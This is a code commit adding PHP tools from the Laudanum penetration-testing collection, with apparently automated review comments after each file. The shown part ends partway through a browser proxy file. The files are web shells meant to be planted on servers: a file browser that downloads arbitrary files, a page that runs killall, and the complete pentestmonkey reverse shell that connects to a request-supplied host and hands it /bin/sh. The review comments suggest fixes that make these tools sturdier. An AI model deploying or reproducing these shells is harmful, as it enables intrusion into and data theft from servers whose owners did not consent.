Added files via upload

Adam Muntner 2016-03-09 19:27:58 -05:00
parent 1162ef5379
commit a10dc295fd
9 changed files with 1602 additions and 0 deletions


@ -0,0 +1,144 @@
<?php
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@counterhack.com>
***
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
***
********************************************************************************
***
*** This file provides access to DNS on the system.
*** Written by Tim Medin <tim@counterhack.com>
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***
***************************************************************************** */
include 'ipcheck.php';
/* This error handler will turn all notices, warnings, and errors into fatal
* errors, unless they have been suppressed with the @-operator. */
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
/* The @-opertor (used with chdir() below) temporarely makes
* error_reporting() return zero, and we don't want to die in that case.
* We do note the error in the output, though. */
if (error_reporting() == 0) {
$_SESSION['output'] .= $errstr . "\n";
} else {
die('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Laudanum PHP DNS Access</title>
</head>
<body>
<h1>Fatal Error!</h1>
<p><b>' . $errstr . '</b></p>
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
<hr>
<address>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>');
}
}
set_error_handler('error_handler');
/* Initialize some variables we need again and again. */
$query = isset($_POST['query']) ? $_POST['query'] : '';
$type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY';
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Laudanum PHP DNS Access</title>
<link rel="stylesheet" href="style.css" type="text/css">
<script type="text/javascript">
function init() {
document.dns.query.focus();
}
</script>
</head>
<body onload="init()">
<h1>DNS Query 0.1</h1>
<form name="dns" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST">
<fieldset>
<legend>DNS Lookup:</legend>
<p>Query:<input name="query" type="text">
Type:<select name="type">
<?php
$types = array("A" => DNS_A, "CNAME" => DNS_CNAME, "HINFO" => DNS_HINFO, "MX" => DNS_MX, "NS" => DNS_NS, "PTR" => DNS_PTR, "SOA" => DNS_SOA, "TXT" => DNS_TXT, "AAAA" => DNS_AAAA, "SRV" => DNS_SRV, "NAPTR" => DNS_NAPTR, "A6" => DNS_A6, "ALL" => DNS_ALL, "ANY" => DNS_ANY);
if (!in_array($type, array_keys($types))) {
$type = "ANY";
}
$validtype = 0;
foreach (array_keys($types) as $t) {
echo " <option value=\"$t\"" . (($type == $t) ? " SELECTED" : "") . ">$t</option>\n";
}
?>
</select>
<input type="submit" value="Submit">
</fieldset>
</form>
<?php
if ($query != '')
{
$result = dns_get_record($query, $types[$type], $authns, $addtl);
echo "<pre><results>";
echo "Result = ";
print_r($result);
echo "Auth NS = ";
print_r($authns);
echo "Additional = ";
print_r($addtl);
echo "</results></pre>";
}
?>
<hr>
<address>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>
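Review bot: The lookup output from `print_r($result)`, `print_r($authns)` and `print_r($addtl)` is written into the page unescaped, and DNS record data (TXT content in particular) is set by whoever operates the queried zone, so markup in a record would render in the operator's browser. Each call should be wrapped, e.g. `echo htmlspecialchars(print_r($result, true), ENT_QUOTES, 'UTF-8');`. The same escaping is missing on `$_SERVER['PHP_SELF']` in the form action and on `$errstr` in the error handler's `die()` page; the unescaped `PHP_SELF` echo recurs in the file browser and host lookup sections below. `$validtype` is assigned and never read, and the `'DNS_ANY'` default for `$type` is never a key of `$types`, so it only works because of the fallback to `"ANY"`.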


@ -0,0 +1,182 @@
<?php
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@counterhack.com>
***
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
***
********************************************************************************
***
*** This file allows browsing of the file system.
*** Written by Tim Medin <tim@counterhack.com>
***
*** 12/28/2013 - updated by Jason Gillam <jgillam@secureideas.com> - fixed parent folder.
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***
***************************************************************************** */
include 'ipcheck.php';
/* This error handler will turn all notices, warnings, and errors into fatal
* errors, unless they have been suppressed with the @-operator. */
function wpl_error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
/* The @-opertor (used with chdir() below) temporarely makes
* error_reporting() return zero, and we don't want to die in that case.
* We do note the error in the output, though. */
if (error_reporting() == 0) {
$_SESSION['output'] .= $errstr . "\n";
} else {
die('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Laudanum PHP File Browser</title>
</head>
<body>
<h1>Fatal Error!</h1>
<p><b>' . $errstr . '</b></p>
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
<hr>
<address>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>');
}
}
//set_error_handler('error_handler');
/* Initialize some variables we need again and again. */
$dir = isset($_GET["dir"]) ? $_GET["dir"] : ".";
$file = isset($_GET["file"]) ? $_GET["file"] : "";
if ($file != "") {
if(file_exists($file)) {
$s = split("/", $file);
$filename = $s[count($s) - 1];
header("Content-type: application/x-download");
header("Content-Length: ".filesize($file));
header("Content-Disposition: attachment; filename=\"".$filename."\"");
readfile($file);
die();
}
}
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Laudanum File Browser</title>
<link rel="stylesheet" href="style.css" type="text/css">
<script type="text/javascript">
</script>
</head>
<body onload="init()">
<h1>Laudanum File Browser 0.1</h1>
<a href="<?php echo $_SERVER['PHP_SELF'] ?>">Home</a><br/>
<?php
// get the actual path, add an ending / if necessary
$curdir = realpath($dir);
$curdir .= substr($curdir, -1) != "/" ? "/" : "";
$dirs = split("/",$curdir);
// Create the breadcrumb
echo "<h2>Directory listing of <a href=\"" . $_SERVER['PHP_SELF'] . "?dir=/\">/</a> ";
$breadcrumb = '/';
foreach ($dirs as $d) {
if ($d != '') {
$breadcrumb .= $d . "/";
echo "<a href=\"" . $_SERVER['PHP_SELF'] . "?dir=" . urlencode($breadcrumb) . "\">$d/</a> ";
}
}
echo "</h2>";
// translate .. to a real dir
$parentdir = "";
for ($i = 0; $i < count($dirs) - 2; $i++) {
$parentdir .= $dirs[$i] . "/";
}
echo "<table>";
echo "<tr><th>Name</th><th>Date</th><th>Size</th></tr>";
echo "<tr><td><a href=\"" . $_SERVER['PHP_SELF'] . "?dir=" . $parentdir . "\">../</a></td><td> </td><td> </td></tr>";
//get listing, separate into directories and files
$listingfiles = array();
$listingdirs = array();
if ($handle = @opendir($curdir)) {
while ($o = readdir($handle)) {
if ($o == "." || $o == "..") continue;
if (@filetype($curdir . $o) == "dir") {
$listingdirs[] = $o . "/";
}
else {
$listingfiles[] = $o;
}
}
@natcasesort($listingdirs);
@natcasesort($listingfiles);
//display directories
foreach ($listingdirs as $f) {
echo "<tr><td><a href=\"" . $_SERVER['PHP_SELF'] . "?dir=" . urlencode($curdir . $f) . "\">" . $f . "</a></td><td align=\"right\">" . "</td><td> <td></tr>";
}
//display files
foreach ($listingfiles as $f) {
echo "<tr><td><a href=\"" . $_SERVER['PHP_SELF'] . "?file=" . urlencode($curdir . $f) . "\">" . $f . "</a></td><td align=\"right\">" . "</td><td align=\"right\">" . number_format(@filesize($curdir . $f)) . "<td></tr>";
}
}
else {
echo "<tr><td colspan=\"3\"><h1>Can't open directory</h1></td></tr>";
}
?>
</table>
<hr>
<address>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>
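Review bot: Directory entry names are echoed into the listing unescaped (`$f` in both `foreach` loops and `$d` in the breadcrumb), so a file whose name contains markup is rendered as HTML in the operator's browser; the link text should go through `htmlspecialchars($f, ENT_QUOTES, 'UTF-8')`, and `$parentdir` in the `../` link should be `urlencode()`d like the other `dir=` values. `split()` was deprecated in PHP 5.3 and removed in PHP 7, so both `split("/", ...)` calls fail on current PHP; `basename($file)` and `explode("/", $curdir)` do the same job. The loop `while ($o = readdir($handle))` ends early on an entry named `0` and should read `while (false !== ($o = readdir($handle)))`. The page also calls `init()` from `onload` although the script block is empty, and the handler is named `wpl_error_handler` while the commented-out registration still names `error_handler`.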


@ -0,0 +1,126 @@
<?php
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@counterhack.com>
***
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
***
********************************************************************************
***
*** This file provides a host lookup by ip address.
*** Written by Jason Gillam <jgillam@secureideas.com>
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***
***************************************************************************** */
include 'ipcheck.php';
/* This error handler will turn all notices, warnings, and errors into fatal
* errors, unless they have been suppressed with the @-operator. */
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
/* The @-opertor (used with chdir() below) temporarely makes
* error_reporting() return zero, and we don't want to die in that case.
* We do note the error in the output, though. */
if (error_reporting() == 0) {
$_SESSION['output'] .= $errstr . "\n";
} else {
die('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Laudanum PHP Hostname by IP Lookup</title>
</head>
<body>
<h1>Fatal Error!</h1>
<p><b>' . $errstr . '</b></p>
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
<hr>
<address>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>');
}
}
set_error_handler('error_handler');
/* Initialize some variables we need again and again. */
$query = isset($_POST['query']) ? $_POST['query'] : '';
$type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY';
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Laudanum Host Lookup</title>
<link rel="stylesheet" href="style.css" type="text/css">
<script type="text/javascript">
function init() {
document.dns.query.focus();
}
</script>
</head>
<body onload="init()">
<h1>Host Lookup 0.1</h1>
<form name="dns" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST">
<fieldset>
<legend>Host Lookup:</legend>
<p>IP:<input name="query" type="text">
</select>
<input type="submit" value="Submit">
</fieldset>
</form>
<?php
if ($query != '')
{
$result = gethostbyaddr($query);
echo "<pre><results>";
echo "Result = ";
print_r($result);
echo "</results></pre>";
}
?>
<hr>
<address>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>
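Review bot: `$query` goes to `gethostbyaddr()` without validation, and a malformed address makes that call raise a warning, which the handler installed by `set_error_handler('error_handler')` turns into the "Fatal Error!" page. A guard such as `if (filter_var($query, FILTER_VALIDATE_IP) === false) { echo "Invalid IP address"; }` before the lookup gives a usable message instead. The result should also be escaped with `htmlspecialchars()` before it is printed, since the returned name comes from reverse DNS. `$type` is read from the request but never used here, and the form contains a stray `</select>` with no opening tag; both look like leftovers from the DNS page.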


@ -0,0 +1,61 @@
<?php
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@counterhack.com>
***
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
***
********************************************************************************
***
*** This file provides a rudamentary IP filter to help prevent usage of Laudanum tools
*** by someone other than the person who uploaded Laudanum. This file should be included
*** in other Laudanum tools and not called directly.
*** Written by Jason Gillam <jgillam@secureideas.com>
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***
***************************************************************************** */
// ***************** Config entries below ***********************
// IPs are enterable as individual addresses TODO: add CIDR support
$wpl_allowedIPs = array("192.168.0.2", "127.0.0.1", "172.16.179.1");
# *********** No editable content below this line **************
$wpl_allowed = 0;
foreach ($wpl_allowedIPs as $IP) {
if ($_SERVER["REMOTE_ADDR"] == $IP)
$wpl_allowed = 1;
}
if ($wpl_allowed == 0) {
header("HTTP/1.0 404 Not Found");
die();
}
?>
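Review bot: The allow-list ships with three preset addresses, including `127.0.0.1`, so a copy deployed without editing does not fail closed: it admits those private addresses, and presumably any request relayed by a reverse proxy on the same host, since only `REMOTE_ADDR` is checked. An empty default, `$wpl_allowedIPs = array();`, with a comment telling the operator to add their own address, would keep the tools unreachable until configured. As a point of style, the loop can be replaced by `$wpl_allowed = in_array($_SERVER["REMOTE_ADDR"], $wpl_allowedIPs, true) ? 1 : 0;`, which also makes the comparison strict.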


@ -0,0 +1,103 @@
<?php
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net>
*** Tim Medin <tim@counterhack.com>
***
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
***
********************************************************************************
***
*** This file attempts to kill all netcat processes spawned by the current user.
*** This may be useful in cases where a reverse shell attempt has gone wrong.
***
*** Written by Jason Gillam <jgillam@secureideas.com>
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***
***************************************************************************** */
include 'ipcheck.php';
/* This error handler will turn all notices, warnings, and errors into fatal
* errors, unless they have been suppressed with the @-operator. */
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
/* The @-opertor (used with chdir() below) temporarely makes
* error_reporting() return zero, and we don't want to die in that case.
* We do note the error in the output, though. */
if (error_reporting() == 0) {
$_SESSION['output'] .= $errstr . "\n";
} else {
die('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Laudanum PHP Hostname by IP Lookup</title>
</head>
<body>
<h1>Fatal Error!</h1>
<p><b>' . $errstr . '</b></p>
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
<hr>
<address>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>');
}
}
set_error_handler('error_handler');
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Laudanum Kill nc</title>
<link rel="stylesheet" href="style.css" type="text/css">
</head>
<body>
<h1>Kill nc 0.1</h1>
<?php echo exec('killall nc');?>
<hr>
<address>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>
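Review bot: `exec('killall nc')` runs on every load of the page, including a plain GET from a link preview or a browser prefetch, so the state-changing action has no confirmation step; gating it on `if ($_SERVER['REQUEST_METHOD'] === 'POST')` behind a small form would make it deliberate. `exec()` returns only the last line of the command's output, so the page shows nothing useful when `killall` fails; passing the optional output and result-code arguments and printing them escaped would report the outcome. The error handler's `<title>` still reads "Laudanum PHP Hostname by IP Lookup" and its comment refers to a `chdir()` call that is not in this file, both apparently copied from another tool.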


@ -0,0 +1,194 @@
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
set_time_limit (0);
$VERSION = "1.0";
$ip = isset($_POST['ip']) ? $_POST['ip'] : '10.2.2.1';
//$ip = '10.2.2.1'; // CHANGE THIS
//$port = 8888; // CHANGE THIS
$port = isset($_POST['port']) ? $_POST['port'] : '8888';
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>
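Review bot: Unlike the other tools visible in this commit, this file does not begin with `include 'ipcheck.php';`, yet it takes its destination from `$_POST['ip']` and `$_POST['port']`, so on a client system it is usable by any requester who reaches it. That is the exposure the ipcheck.php header says the filter exists to prevent. The include should be added before `set_time_limit (0);`, and `$port` should be validated as an integer in the 1–65535 range before use. The description comment still says the connection goes to "a hardcoded IP and port"; it should state that both values come from the request, with `10.2.2.1` and `8888` as defaults.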


@ -0,0 +1,336 @@
<?php
ini_set('session.use_cookies', '0');
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@counterhack.com>
***
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
***
********************************************************************************
***
*** This file acts as a browser-based proxy.
*** Written by Tim Medin <tim@counterhack.com>
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***
***************************************************************************** */
// TODO: If the remote site uses a sessionid it collides with the php sessionid cookie from this page
// figure out how to reuse sessionid from the remote site
include 'ipcheck.php';
/* This error handler will turn all notices, warnings, and errors into fatal
* errors, unless they have been suppressed with the @-operator. */
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
/* The @-opertor (used with chdir() below) temporarely makes
* error_reporting() return zero, and we don't want to die in that case.
* We do note the error in the output, though. */
if (error_reporting() == 0) {
$_SESSION['output'] .= $errstr . "\n";
} else {
die('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Laudanum PHP Proxy</title>
</head>
<body>
<h1>Fatal Error!</h1>
<p><b>' . $errstr . '</b></p>
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
<hr>
<address>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>');
}
}
set_error_handler('error_handler');
function geturlarray($u) {
// creates the url array, addes a scheme if it is missing and retries parsing
$o = parse_url($u);
if (!isset($o["scheme"])) { $o = parse_url("http://" . $u); }
if (!isset($o["path"])) { $o["path"] = "/"; }
return $o;
}
function buildurl ($u) {
// build the url from the url array
// this is used because the built in function isn't
// avilable in all installs of php
if (!isset($u["host"])) { return null; }
$s = isset($u["scheme"]) ? $u["scheme"] : "http";
$s .= "://" . $u["host"];
$s .= isset($u["port"]) ? ":" . $u["port"] : "";
$s .= isset($u["path"]) ? $u["path"] : "/";
$s .= isset($u["query"]) ? "?" . $u["query"] : "";
$s .= isset($u["fragment"]) ? "#" . $u["fragment"] : "";
return $s;
}
function buildurlpath ($u) {
//gets the full url and attempts to remove the file at the end of the url
// e.g. http://blah.com/dir/file.ext => http://blah.com/dir/
if (!isset($u["host"])) { return null; }
$s = isset($u["scheme"])? $u["scheme"] : "http";
$s .= "://" . $u["host"];
$s .= isset($u["port"]) ? ":" . $u["port"] : "";
$path = isset($u["path"]) ? $u["path"] : "/";
// is the last portion of the path a file or a dir?
// assume if there is a . it is a file
// if it ends in a / then it is a dir
// if neither, than assume dir
$dirs = explode("/", $path);
$last = $dirs[count($dirs) - 1];
if (preg_match('/\./', $last) || !preg_match('/\/$/', $last)) {
// its a file, remove the last chunk
$path = substr($path, 0, -1 * strlen($last));
}
$s .= $path;
return $s;
}
function getfilename ($u) {
// returns the file name
// e.g. http://blah.com/dir/file.ext returns file.ext
// technically, it is the last portion of the url, so there is a potential
// for a problem if a http://blah.com/dir returns a file
$s = explode("/", $u["path"]);
return $s[count($s) - 1];
}
function getcontenttype ($headers) {
// gets the content type
foreach($headers as $h) {
if (preg_match_all("/^Content-Type: (.*)$/", $h, $out)) {
return $out[1][0];
}
}
}
function getcontentencoding ($headers) {
foreach ($headers as $h) {
if (preg_match_all("/^Content-Encoding: (.*)$/", $h, $out)) {
return $out[1][0];
}
}
}
function removeheader($header, $headers) {
foreach (array_keys($headers) as $key) {
if (preg_match_all("/^" . $header . ": (.*)$/", $headers[$key], $out)) {
unset($headers[$key]);
return $headers;
}
}
}
function rewritecookies($headers) {
// removes the path and domain from cookies
for ($i = 0; $i < count($headers); $i++) {
if (preg_match_all("/^Set-Cookie:/", $headers[$i], $out)) {
$headers[$i] = preg_replace("/domain=[^[:space:]]+/", "", $headers[$i]);
$headers[$i] = preg_replace("/path=[^[:space:]]+/", "", $headers[$i]);
}
}
return $headers;
}
function getsessionid($headers) {
for ($i = 0; $i < count($headers); $i++) {
if (preg_match_all("/^Set-Cookie: SessionID=([a-zA-Z0-9]+);/", $headers[$i], $out))
return $out[1][0];
}
return "0";
}
function compatible_gzinflate($gzData) {
if ( substr($gzData, 0, 3) == "\x1f\x8b\x08" ) {
$i = 10;
$flg = ord( substr($gzData, 3, 1) );
if ( $flg > 0 ) {
